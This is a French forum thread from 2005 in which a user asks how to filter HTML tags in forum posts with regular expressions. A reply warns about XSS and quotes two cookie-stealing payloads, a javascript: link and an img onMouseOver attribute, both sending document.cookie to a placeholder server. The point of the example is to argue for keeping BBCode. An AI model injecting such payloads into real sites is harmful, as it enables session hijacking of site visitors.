html dans form

Répondre
rosema
le 25/04/2005 à 11:43
rosema
Salut à tous,
Suivant les chers conseils de rex j'autorise le HTML dans mon forum putôt que les bbcodes vu que je m'adresse à des habitués du HTML.
Seulement voila je vousrais inerdire certaines balises dic, body... mais je n'ay arrive pas avec le regex dès que l'utilisateur y ajoute des propriétés.
Exemple: je sopppe bien le <div> mais pas le <div prop="titi" class="toto"...>

Et je n'arrive pas non plus à vérifier que toute les balises sont fermées(même un <i> pas fermé ça fout en l'air le site...

Ca fait un paquet de problèmes mais je m'arrche les cheveux.smiley
c 'est incroyable ce que je peux écrire comme conneries
Bzh
le 25/04/2005 à 12:04
Bzh
Sincèrement !!!! La faille XSS peut être une faille très dangereuse si elle est bien utilisé !!!

Déja, faire un BB-code sans faille n' est pas facile !!!

Mais là encore pire... Je te souhaite bon courage...


ps: si le BB-code existe, c' est qu' il y a bien une raison...
rosema
le 25/04/2005 à 13:35
rosema
faille XSS? mais comment si on autorise que certaines balises?
c 'est incroyable ce que je peux écrire comme conneries
Bzh
le 25/04/2005 à 13:49
Bzh
par exemple, tu vas bien être obligé d' accepter la balise '<a href="">Cliquez ici</a>'

Bon bin =>

<a href="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">Cliquez ici</a>

Ou bien avec la balise img =>

<img src="adresse de l' image" onMouseOver="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">*

Evidement que tu peux te protèger !!! Mais là ça se complique vraiment beaucoup !!!

Je te le redis, si le BB-code existe il y a bien une raison à cela !!!

Bye...
rosema
le 25/04/2005 à 13:51
rosema
Ah ouaip merci j'y pense pour la suite je reste ave mon bon vieux BBcodes
c 'est incroyable ce que je peux écrire comme conneries
Bzh
le 25/04/2005 à 13:55
Bzh
Parcontre ça peut être un très bon exercice pour les expressions régulières !!! smiley

A toi de voir !!!

smiley
rosema
le 25/04/2005 à 14:02
rosema
Ouiap c'est ce que j'avais vu mais comme les failles possibles sont nombreuses et qu'en terme de sécurité je débute je vais m'abstenir pour le moment...
c 'est incroyable ce que je peux écrire comme conneries
Bzh
le 25/04/2005 à 14:28
Bzh
J' ai fait un petit tour sur ton site...

Le site est très acceuillant, la navigation est facile et le design est plutot réussi !!!

Parcontre, avec firefox, le menu à quelques petits problèmes...

Rassure toi, rien de très grave...

Bye...
Répondre

Ecrire un message

Votre message vient d'être créé avec succès.
LoadingChargement en cours